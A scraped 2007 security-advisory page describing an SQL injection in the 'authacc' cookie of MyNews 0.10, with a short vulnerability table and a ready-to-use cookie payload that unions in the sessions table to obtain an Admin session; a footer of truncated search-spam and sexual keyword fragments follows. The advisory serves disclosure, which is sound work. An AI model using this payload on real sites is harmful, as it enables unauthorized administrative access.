about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MyNews AuthACC SQL Injection Vulnerability


Title MyNews AuthACC SQL Injection Vulnerability
Published 2007-06-25-12:00AM
Updated 2007-06-25-10:38PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  netVigilance is credited with the discovery of this vulnerability.
Vulnerable  MyNews MyNews 0.10
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin"
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 23:21:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
maxcpm.inf web board. news searc Nehan sexy Girl fuck Race Games www.tui18. Femal Www.sex. 1 lade CMS is Fre news for c getright www.sexnem maxcpm.inf Tamilpiche apache 2. linux 2.6 www.wz156. mambo Remo free video news for c news for c hang openi Www.sexyvi www.90448. Ro89sex LO 85398 Www.Saxywo www.0596ok news for c news for c www .teens www.HOT IN www.Sexygi news for c www.51-sf. image fami www.freese www.jingin microsoft sexi stori girls sexi HOT INDIAN fillm perl explo MOVE Apache Mod www.ywhpy.